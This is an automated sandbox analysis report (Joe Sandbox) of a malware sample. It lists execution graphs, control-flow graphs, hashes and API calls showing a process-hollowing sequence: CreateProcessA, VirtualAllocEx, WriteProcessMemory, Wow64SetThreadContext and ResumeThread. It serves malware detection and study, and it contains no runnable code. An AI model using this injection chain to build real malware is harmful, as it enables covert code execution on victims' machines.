                                        execution_graph 20199 d2b070 20202 d2b159 20199->20202 20200 d2b07f 20203 d2b19c 20202->20203 20204 d2b179 20202->20204 20203->20200 20204->20203 20205 d2b3a0 GetModuleHandleW 20204->20205 20206 d2b3cd 20205->20206 20206->20200 20376 d2d800 20377 d2d846 GetCurrentProcess 20376->20377 20379 d2d891 20377->20379 20380 d2d898 GetCurrentThread 20377->20380 20379->20380 20381 d2d8d5 GetCurrentProcess 20380->20381 20382 d2d8ce 20380->20382 20383 d2d90b 20381->20383 20382->20381 20384 d2d933 GetCurrentThreadId 20383->20384 20385 d2d964 20384->20385 20207 6ac1a86 20208 6ac1a8c 20207->20208 20209 6ac1a67 20207->20209 20214 6ac3bc6 20208->20214 20230 6ac3b50 20208->20230 20245 6ac3b60 20208->20245 20210 6ac1bff 20215 6ac3b54 20214->20215 20216 6ac3bc9 20214->20216 20222 6ac3b82 20215->20222 20260 6ac3fbf 20215->20260 20267 6ac42dd 20215->20267 20272 6ac4741 20215->20272 20277 6ac45c7 20215->20277 20281 6ac4286 20215->20281 20286 6ac43a4 20215->20286 20292 6ac420a 20215->20292 20299 6ac4073 20215->20299 20304 6ac4012 20215->20304 20309 6ac40d2 20215->20309 20313 6ac4270 20215->20313 20319 6ac4194 20215->20319 20216->20210 20222->20210 20231 6ac3b54 20230->20231 20232 6ac420a 4 API calls 20231->20232 20233 6ac3b82 20231->20233 20234 6ac43a4 2 API calls 20231->20234 20235 6ac4286 2 API calls 20231->20235 20236 6ac45c7 2 API calls 20231->20236 20237 6ac4741 2 API calls 20231->20237 20238 6ac42dd 2 API calls 20231->20238 20239 6ac3fbf 4 API calls 20231->20239 20240 6ac4194 4 API calls 20231->20240 20241 6ac4270 2 API calls 20231->20241 20242 6ac40d2 2 API calls 20231->20242 20243 6ac4012 2 API calls 20231->20243 20244 6ac4073 2 API calls 20231->20244 20232->20233 20233->20210 20234->20233 20235->20233 20236->20233 20237->20233 20238->20233 20239->20233 20240->20233 20241->20233 20242->20233 20243->20233 20244->20233 20246 6ac3b7a 20245->20246 20247 6ac420a 4 API calls 20246->20247 20248 6ac43a4 2 API calls 20246->20248 20249 6ac4286 2 API 
calls 20246->20249 20250 6ac45c7 2 API calls 20246->20250 20251 6ac4741 2 API calls 20246->20251 20252 6ac3b82 20246->20252 20253 6ac42dd 2 API calls 20246->20253 20254 6ac3fbf 4 API calls 20246->20254 20255 6ac4194 4 API calls 20246->20255 20256 6ac4270 2 API calls 20246->20256 20257 6ac40d2 2 API calls 20246->20257 20258 6ac4012 2 API calls 20246->20258 20259 6ac4073 2 API calls 20246->20259 20247->20252 20248->20252 20249->20252 20250->20252 20251->20252 20252->20210 20253->20252 20254->20252 20255->20252 20256->20252 20257->20252 20258->20252 20259->20252 20328 6ac15e5 20260->20328 20332 6ac15f0 20260->20332 20268 6ac4300 20267->20268 20336 6ac1368 20268->20336 20340 6ac1361 20268->20340 20269 6ac4564 20269->20222 20273 6ac401e 20272->20273 20273->20272 20274 6ac4865 20273->20274 20275 6ac1368 WriteProcessMemory 20273->20275 20276 6ac1361 WriteProcessMemory 20273->20276 20274->20222 20275->20273 20276->20273 20344 6ac12a8 20277->20344 20348 6ac12a7 20277->20348 20278 6ac45e5 20282 6ac428c 20281->20282 20284 6ac1368 WriteProcessMemory 20282->20284 20285 6ac1361 WriteProcessMemory 20282->20285 20283 6ac4122 20283->20222 20284->20283 20285->20283 20287 6ac445b 20286->20287 20288 6ac401e 20286->20288 20287->20222 20289 6ac4865 20288->20289 20290 6ac1368 WriteProcessMemory 20288->20290 20291 6ac1361 WriteProcessMemory 20288->20291 20289->20222 20290->20288 20291->20288 20352 6ac1458 20292->20352 20356 6ac1450 20292->20356 20293 6ac401e 20294 6ac445b 20293->20294 20295 6ac1368 WriteProcessMemory 20293->20295 20296 6ac1361 WriteProcessMemory 20293->20296 20294->20222 20295->20293 20296->20293 20300 6ac4079 20299->20300 20360 6ac08ab 20300->20360 20364 6ac08b0 20300->20364 20301 6ac409f 20301->20222 20305 6ac401e 20304->20305 20306 6ac4865 20305->20306 20307 6ac1368 WriteProcessMemory 20305->20307 20308 6ac1361 WriteProcessMemory 20305->20308 20306->20222 20307->20305 20308->20305 20368 6ac095b 20309->20368 20372 6ac0960 20309->20372 20310 6ac40ec 20310->20222 20314 
6ac429d 20313->20314 20315 6ac46c0 20314->20315 20317 6ac1368 WriteProcessMemory 20314->20317 20318 6ac1361 WriteProcessMemory 20314->20318 20315->20222 20316 6ac4122 20316->20222 20317->20316 20318->20316 20320 6ac4491 20319->20320 20322 6ac408a 20320->20322 20323 6ac409f 20320->20323 20324 6ac095b Wow64SetThreadContext 20320->20324 20325 6ac0960 Wow64SetThreadContext 20320->20325 20321 6ac473b 20321->20222 20322->20321 20326 6ac08ab ResumeThread 20322->20326 20327 6ac08b0 ResumeThread 20322->20327 20323->20222 20324->20322 20325->20322 20326->20323 20327->20323 20329 6ac15f0 CreateProcessA 20328->20329 20331 6ac183b 20329->20331 20331->20331 20333 6ac1679 CreateProcessA 20332->20333 20335 6ac183b 20333->20335 20335->20335 20337 6ac13b0 WriteProcessMemory 20336->20337 20339 6ac1407 20337->20339 20339->20269 20341 6ac1368 WriteProcessMemory 20340->20341 20343 6ac1407 20341->20343 20343->20269 20345 6ac12e8 VirtualAllocEx 20344->20345 20347 6ac1325 20345->20347 20347->20278 20349 6ac12a8 VirtualAllocEx 20348->20349 20351 6ac1325 20349->20351 20351->20278 20353 6ac14a3 ReadProcessMemory 20352->20353 20355 6ac14e7 20353->20355 20355->20293 20357 6ac1458 ReadProcessMemory 20356->20357 20359 6ac14e7 20357->20359 20359->20293 20361 6ac08b0 ResumeThread 20360->20361 20363 6ac0921 20361->20363 20363->20301 20365 6ac08f0 ResumeThread 20364->20365 20367 6ac0921 20365->20367 20367->20301 20369 6ac09a5 Wow64SetThreadContext 20368->20369 20371 6ac09ed 20369->20371 20371->20310 20373 6ac09a5 Wow64SetThreadContext 20372->20373 20375 6ac09ed 20373->20375 20375->20310 20386 d2da48 DuplicateHandle 20387 d2dade 20386->20387 20388 6ac4d70 20389 6ac4efb 20388->20389 20391 6ac4d96 20388->20391 20391->20389 20392 6ac3264 20391->20392 20393 6ac4ff0 PostMessageW 20392->20393 20394 6ac505a 20393->20394 20394->20391

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 526 d2d7f0-d2d88f GetCurrentProcess 531 d2d891-d2d897 526->531 532 d2d898-d2d8cc GetCurrentThread 526->532 531->532 533 d2d8d5-d2d909 GetCurrentProcess 532->533 534 d2d8ce-d2d8d4 532->534 536 d2d912-d2d92d call d2d9cf 533->536 537 d2d90b-d2d911 533->537 534->533 540 d2d933-d2d962 GetCurrentThreadId 536->540 537->536 541 d2d964-d2d96a 540->541 542 d2d96b-d2d9cd 540->542 541->542
                                        APIs
                                        • GetCurrentProcess.KERNEL32 ref: 00D2D87E
                                        • GetCurrentThread.KERNEL32 ref: 00D2D8BB
                                        • GetCurrentProcess.KERNEL32 ref: 00D2D8F8
                                        • GetCurrentThreadId.KERNEL32 ref: 00D2D951
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1840078036.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_d20000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID: Current$ProcessThread
                                        • String ID:
                                        • API String ID: 2063062207-0
                                        • Opcode ID: b23eb805d5216263ff410192c356ee629000415bdd08a7f6d49a982d30d4eeed
                                        • Instruction ID: f28c9b7e24837d36fb8631c041742f93561f8f70092c3459a8b9764bd37e8f3a
                                        • Opcode Fuzzy Hash: b23eb805d5216263ff410192c356ee629000415bdd08a7f6d49a982d30d4eeed
                                        • Instruction Fuzzy Hash: A35155B0D00349CFDB14DFA9D588B9EBBF1AF88304F248469E449A73A1DB749984CF65

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 549 d2d800-d2d88f GetCurrentProcess 553 d2d891-d2d897 549->553 554 d2d898-d2d8cc GetCurrentThread 549->554 553->554 555 d2d8d5-d2d909 GetCurrentProcess 554->555 556 d2d8ce-d2d8d4 554->556 558 d2d912-d2d92d call d2d9cf 555->558 559 d2d90b-d2d911 555->559 556->555 562 d2d933-d2d962 GetCurrentThreadId 558->562 559->558 563 d2d964-d2d96a 562->563 564 d2d96b-d2d9cd 562->564 563->564
                                        APIs
                                        • GetCurrentProcess.KERNEL32 ref: 00D2D87E
                                        • GetCurrentThread.KERNEL32 ref: 00D2D8BB
                                        • GetCurrentProcess.KERNEL32 ref: 00D2D8F8
                                        • GetCurrentThreadId.KERNEL32 ref: 00D2D951
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1840078036.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_d20000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID: Current$ProcessThread
                                        • String ID:
                                        • API String ID: 2063062207-0
                                        • Opcode ID: e393747daca1d160398effdf40dec0fe9d80e891fd5bdb85ce324efe0f704711
                                        • Instruction ID: 61cc389c548d91df3f7c303d8d2857ccc678a7e41b757d10dae4a45ad136a471
                                        • Opcode Fuzzy Hash: e393747daca1d160398effdf40dec0fe9d80e891fd5bdb85ce324efe0f704711
                                        • Instruction Fuzzy Hash: 155125B0D00349CFDB14DFAAD588B9EBBF1AB88314F24C459E419A73A0DB749984CF65

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 637 6ac15e5-6ac1685 640 6ac16be-6ac16de 637->640 641 6ac1687-6ac1691 637->641 646 6ac1717-6ac1746 640->646 647 6ac16e0-6ac16ea 640->647 641->640 642 6ac1693-6ac1695 641->642 644 6ac16b8-6ac16bb 642->644 645 6ac1697-6ac16a1 642->645 644->640 648 6ac16a5-6ac16b4 645->648 649 6ac16a3 645->649 657 6ac177f-6ac1839 CreateProcessA 646->657 658 6ac1748-6ac1752 646->658 647->646 650 6ac16ec-6ac16ee 647->650 648->648 651 6ac16b6 648->651 649->648 652 6ac16f0-6ac16fa 650->652 653 6ac1711-6ac1714 650->653 651->644 655 6ac16fc 652->655 656 6ac16fe-6ac170d 652->656 653->646 655->656 656->656 659 6ac170f 656->659 669 6ac183b-6ac1841 657->669 670 6ac1842-6ac18c8 657->670 658->657 660 6ac1754-6ac1756 658->660 659->653 662 6ac1758-6ac1762 660->662 663 6ac1779-6ac177c 660->663 664 6ac1764 662->664 665 6ac1766-6ac1775 662->665 663->657 664->665 665->665 666 6ac1777 665->666 666->663 669->670 680 6ac18d8-6ac18dc 670->680 681 6ac18ca-6ac18ce 670->681 682 6ac18ec-6ac18f0 680->682 683 6ac18de-6ac18e2 680->683 681->680 684 6ac18d0 681->684 686 6ac1900-6ac1904 682->686 687 6ac18f2-6ac18f6 682->687 683->682 685 6ac18e4 683->685 684->680 685->682 689 6ac1916-6ac191d 686->689 690 6ac1906-6ac190c 686->690 687->686 688 6ac18f8 687->688 688->686 691 6ac191f-6ac192e 689->691 692 6ac1934 689->692 690->689 691->692 693 6ac1935 692->693 693->693
                                        APIs
                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06AC1826
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1844645407.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_6ac0000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: 0e0691afa6edf0486728065bd386b11bc9b018ff5f23a12bde3ad75805a18a09
                                        • Instruction ID: ee6a6b679f297ea8d2475cdd88f876587aa2e3315b758611abac345347fa4747
                                        • Opcode Fuzzy Hash: 0e0691afa6edf0486728065bd386b11bc9b018ff5f23a12bde3ad75805a18a09
                                        • Instruction Fuzzy Hash: 69A19C71E00219DFDB60EF69C841BEEBBB2FF48314F1485A9E808A7241DB749981CF91

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 695 6ac15f0-6ac1685 697 6ac16be-6ac16de 695->697 698 6ac1687-6ac1691 695->698 703 6ac1717-6ac1746 697->703 704 6ac16e0-6ac16ea 697->704 698->697 699 6ac1693-6ac1695 698->699 701 6ac16b8-6ac16bb 699->701 702 6ac1697-6ac16a1 699->702 701->697 705 6ac16a5-6ac16b4 702->705 706 6ac16a3 702->706 714 6ac177f-6ac1839 CreateProcessA 703->714 715 6ac1748-6ac1752 703->715 704->703 707 6ac16ec-6ac16ee 704->707 705->705 708 6ac16b6 705->708 706->705 709 6ac16f0-6ac16fa 707->709 710 6ac1711-6ac1714 707->710 708->701 712 6ac16fc 709->712 713 6ac16fe-6ac170d 709->713 710->703 712->713 713->713 716 6ac170f 713->716 726 6ac183b-6ac1841 714->726 727 6ac1842-6ac18c8 714->727 715->714 717 6ac1754-6ac1756 715->717 716->710 719 6ac1758-6ac1762 717->719 720 6ac1779-6ac177c 717->720 721 6ac1764 719->721 722 6ac1766-6ac1775 719->722 720->714 721->722 722->722 723 6ac1777 722->723 723->720 726->727 737 6ac18d8-6ac18dc 727->737 738 6ac18ca-6ac18ce 727->738 739 6ac18ec-6ac18f0 737->739 740 6ac18de-6ac18e2 737->740 738->737 741 6ac18d0 738->741 743 6ac1900-6ac1904 739->743 744 6ac18f2-6ac18f6 739->744 740->739 742 6ac18e4 740->742 741->737 742->739 746 6ac1916-6ac191d 743->746 747 6ac1906-6ac190c 743->747 744->743 745 6ac18f8 744->745 745->743 748 6ac191f-6ac192e 746->748 749 6ac1934 746->749 747->746 748->749 750 6ac1935 749->750 750->750
                                        APIs
                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06AC1826
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1844645407.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_6ac0000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: 723b1a7ed89e26508cef86180b0fd4543d867fc0059db744d741102d37208423
                                        • Instruction ID: 51714d7ea2e66dff38a4e80b4663d578ec508d4670a379c1d322d4bb909d06c0
                                        • Opcode Fuzzy Hash: 723b1a7ed89e26508cef86180b0fd4543d867fc0059db744d741102d37208423
                                        • Instruction Fuzzy Hash: 87918B71E00219CFDB50EFA9C841BEDBBB2FF48324F1485A9E808A7251DB749981CF91

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 752 d2b159-d2b177 753 d2b1a3-d2b1a7 752->753 754 d2b179-d2b186 call d2a4e0 752->754 755 d2b1bb-d2b1fc 753->755 756 d2b1a9-d2b1b3 753->756 761 d2b188 754->761 762 d2b19c 754->762 763 d2b209-d2b217 755->763 764 d2b1fe-d2b206 755->764 756->755 808 d2b18e call d2b3f0 761->808 809 d2b18e call d2b400 761->809 762->753 766 d2b23b-d2b23d 763->766 767 d2b219-d2b21e 763->767 764->763 765 d2b194-d2b196 765->762 768 d2b2d8-d2b398 765->768 769 d2b240-d2b247 766->769 770 d2b220-d2b227 call d2a4ec 767->770 771 d2b229 767->771 803 d2b3a0-d2b3cb GetModuleHandleW 768->803 804 d2b39a-d2b39d 768->804 773 d2b254-d2b25b 769->773 774 d2b249-d2b251 769->774 772 d2b22b-d2b239 770->772 771->772 772->769 777 d2b268-d2b271 call d2a4fc 773->777 778 d2b25d-d2b265 773->778 774->773 783 d2b273-d2b27b 777->783 784 d2b27e-d2b283 777->784 778->777 783->784 785 d2b2a1-d2b2ae 784->785 786 d2b285-d2b28c 784->786 793 d2b2b0-d2b2ce 785->793 794 d2b2d1-d2b2d7 785->794 786->785 788 d2b28e-d2b29e call d2a50c call d2a51c 786->788 788->785 793->794 805 d2b3d4-d2b3e8 803->805 806 d2b3cd-d2b3d3 803->806 804->803 806->805 808->765 809->765
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 00D2B3BE
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1840078036.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_d20000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: 6fca2e06a960980418bb233144a6a4c3bf0374874a1ee269c4daf539319206ee
                                        • Instruction ID: bd3d489456ea5621b3db64da0d955d299de828e4c8347241cffb41d95fe0f496
                                        • Opcode Fuzzy Hash: 6fca2e06a960980418bb233144a6a4c3bf0374874a1ee269c4daf539319206ee
                                        • Instruction Fuzzy Hash: 2C817370A00B148FD724DF29E44575ABBF1FF98318F048A2ED48ADBA40D7B4E845CBA4

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 838 d25e75-d25f41 CreateActCtxA 840 d25f43-d25f49 838->840 841 d25f4a-d25fa4 838->841 840->841 848 d25fb3-d25fb7 841->848 849 d25fa6-d25fa9 841->849 850 d25fc8 848->850 851 d25fb9-d25fc5 848->851 849->848 852 d25fc9 850->852 851->850 852->852
                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 00D25F31
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1840078036.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_d20000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: 8d5747aeaaf8624d4d9fd0ce9da8a14b2ebea3d5c12053da5ba8b3b2ab6f6ea4
                                        • Instruction ID: 130696a62866d9bb2bd85df0500431028b7a870de37591bbd5047d71756b2f78
                                        • Opcode Fuzzy Hash: 8d5747aeaaf8624d4d9fd0ce9da8a14b2ebea3d5c12053da5ba8b3b2ab6f6ea4
                                        • Instruction Fuzzy Hash: 1F41E3B0C00719CFDB24CFA9D984BDEBBB5BF49304F24806AD409AB255DB756946CFA0

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 854 d249d4-d25f41 CreateActCtxA 857 d25f43-d25f49 854->857 858 d25f4a-d25fa4 854->858 857->858 865 d25fb3-d25fb7 858->865 866 d25fa6-d25fa9 858->866 867 d25fc8 865->867 868 d25fb9-d25fc5 865->868 866->865 869 d25fc9 867->869 868->867 869->869
                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 00D25F31
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1840078036.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_d20000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: c760cd90431a5e66f327277783de7e2921c76438ff1c0bce452cc7b706d97830
                                        • Instruction ID: 3ce0e4961d52b9f16d2d7a19105d408fb77b0e1e2d3a6a71906bd5d37f0776e4
                                        • Opcode Fuzzy Hash: c760cd90431a5e66f327277783de7e2921c76438ff1c0bce452cc7b706d97830
                                        • Instruction Fuzzy Hash: FD41E2B0C00B19CFDB24CFA9D944B9EBBF5BF49304F2480AAD409AB255DB756945CFA0

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 871 6ac1361-6ac13b6 874 6ac13b8-6ac13c4 871->874 875 6ac13c6-6ac1405 WriteProcessMemory 871->875 874->875 877 6ac140e-6ac143e 875->877 878 6ac1407-6ac140d 875->878 878->877
                                        APIs
                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06AC13F8
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1844645407.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_6ac0000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        • Opcode ID: 0a4eaabe12f7cc89d3323645a49856e862e613138f76492f1c2ee00e7b86f338
                                        • Instruction ID: 1ed3c3535a38af52b93f2001409fc17011c02c5acc840fcf5776675d1f2c6134
                                        • Opcode Fuzzy Hash: 0a4eaabe12f7cc89d3323645a49856e862e613138f76492f1c2ee00e7b86f338
                                        • Instruction Fuzzy Hash: 992155B19002499FCB10DFAAC881BDEBBF5FF48324F10842AE918A7241C7789945CBA0

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 892 6ac1450-6ac14e5 ReadProcessMemory 896 6ac14ee-6ac151e 892->896 897 6ac14e7-6ac14ed 892->897 897->896
                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06AC14D8
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1844645407.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_6ac0000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        • Opcode ID: 7460c5759d1d0b811bd1b5c0473e9f743e678302a81def75c7190fdbef8d9176
                                        • Instruction ID: e7024be00d70bd911c99aff1796299e4deea005246aa12c2a114323b7c4bb93f
                                        • Opcode Fuzzy Hash: 7460c5759d1d0b811bd1b5c0473e9f743e678302a81def75c7190fdbef8d9176
                                        • Instruction Fuzzy Hash: B32136B19003499FCB10DFAAC941ADEFBF5FF48324F10842DE958A7251C7389941CBA5

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 882 6ac1368-6ac13b6 884 6ac13b8-6ac13c4 882->884 885 6ac13c6-6ac1405 WriteProcessMemory 882->885 884->885 887 6ac140e-6ac143e 885->887 888 6ac1407-6ac140d 885->888 888->887
                                        APIs
                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06AC13F8
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1844645407.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_6ac0000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        • Opcode ID: bd862a859a383c7b5695837c153f4b64f4e73e980495c8f32ced29509b6a0b55
                                        • Instruction ID: 42088bf236b90d55c8207796881de0975c8bdb39a46de95564c751c4e59fe965
                                        • Opcode Fuzzy Hash: bd862a859a383c7b5695837c153f4b64f4e73e980495c8f32ced29509b6a0b55
                                        • Instruction Fuzzy Hash: 5F2155B19003499FCB10DFAAC881BDEBBF5FF48324F10842AE918A7351C7789944CBA4
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00D2DACF
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1840078036.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_d20000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: 78efe10e083fac0e9b0c6a9e1adc646a38fa0ba4d5a66217ce3fb80c65c44ded
                                        • Instruction ID: b29bcde97331f1348606021ae307ba129beeae4d7a65ce26162121236f4b64a4
                                        • Opcode Fuzzy Hash: 78efe10e083fac0e9b0c6a9e1adc646a38fa0ba4d5a66217ce3fb80c65c44ded
                                        • Instruction Fuzzy Hash: B321D2B59002589FDB10CFAAD584AEEBFF5EB48324F14846AE954A7311D374A940CFA4
                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06AC14D8
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1844645407.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_6ac0000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        • Opcode ID: 6e3c0982707f499b5714c0de50c22252e6f4ffbba687073fa423e59793d35980
                                        • Instruction ID: ea1269b23f075e3648359b337083413d410f996dfd4e66e76e67eef22d2e8fd1
                                        • Opcode Fuzzy Hash: 6e3c0982707f499b5714c0de50c22252e6f4ffbba687073fa423e59793d35980
                                        • Instruction Fuzzy Hash: 612128B19002599FCB10DFAAC941ADEFBF5FF48320F10842DE558A7251C7349944CBA4
                                        APIs
                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06AC09DE
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1844645407.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_6ac0000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID: ContextThreadWow64
                                        • String ID:
                                        • API String ID: 983334009-0
                                        • Opcode ID: b110081e4e42b7e61a7efaf8736e0e3454742b4f14480005ea69c8034da640c0
                                        • Instruction ID: 4fbfe825aa8906718a77a30fae1ae8d123a42b50a464c1175a1dbcd548e8f60d
                                        • Opcode Fuzzy Hash: b110081e4e42b7e61a7efaf8736e0e3454742b4f14480005ea69c8034da640c0
                                        • Instruction Fuzzy Hash: 242107B19002098FDB10DFAAC4857EEBBF4AB89324F14842DD459A7241CB789985CFA5
                                        APIs
                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06AC09DE
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1844645407.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_6ac0000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID: ContextThreadWow64
                                        • String ID:
                                        • API String ID: 983334009-0
                                        • Opcode ID: e036a26fd66b9738a65812e21be983d7cd60b5529f540c4d209dd43daaefc5a0
                                        • Instruction ID: 3d5695c65777868c8bef2d55d46121ce8f1f5eff3ebbf91ef674cc5f9a200b18
                                        • Opcode Fuzzy Hash: e036a26fd66b9738a65812e21be983d7cd60b5529f540c4d209dd43daaefc5a0
                                        • Instruction Fuzzy Hash: D02107B19002098FDB50DFAAC4857EEFBF4AF48364F14842ED459A7241C7789985CFA4
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00D2DACF
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1840078036.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_d20000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: 33c7015e82ab619a466eb30bd7366b88e1bd20f1ee22802e2add618749c98e19
                                        • Instruction ID: 8871f43a65d5860ff4c0d7d86b5b69d6574e1fecd2b626f3ffc1f71cfe5ce05d
                                        • Opcode Fuzzy Hash: 33c7015e82ab619a466eb30bd7366b88e1bd20f1ee22802e2add618749c98e19
                                        • Instruction Fuzzy Hash: 7B21F3B59002589FDB10CFAAD984ADEFFF9FB48320F14801AE918A3310D374A940CFA4
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06AC1316
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1844645407.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_6ac0000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: 2cd6e67163ad928886b1b90b8f2504c98858f514e17153623d90f579a73c2723
                                        • Instruction ID: 1bcf3ef424d468a7b1c64fe5fe86973d219b1d7b9386fd2f1f41520dee906b49
                                        • Opcode Fuzzy Hash: 2cd6e67163ad928886b1b90b8f2504c98858f514e17153623d90f579a73c2723
                                        • Instruction Fuzzy Hash: A31156759002489FCB10DFAAC845ADEFFF5EB88324F208419E519A7250C735A940CFA4
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06AC1316
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1844645407.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_6ac0000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: 381ed6525e104fd653fbcff4c97995c10adeacf00af96815eb9800bc8847ad04
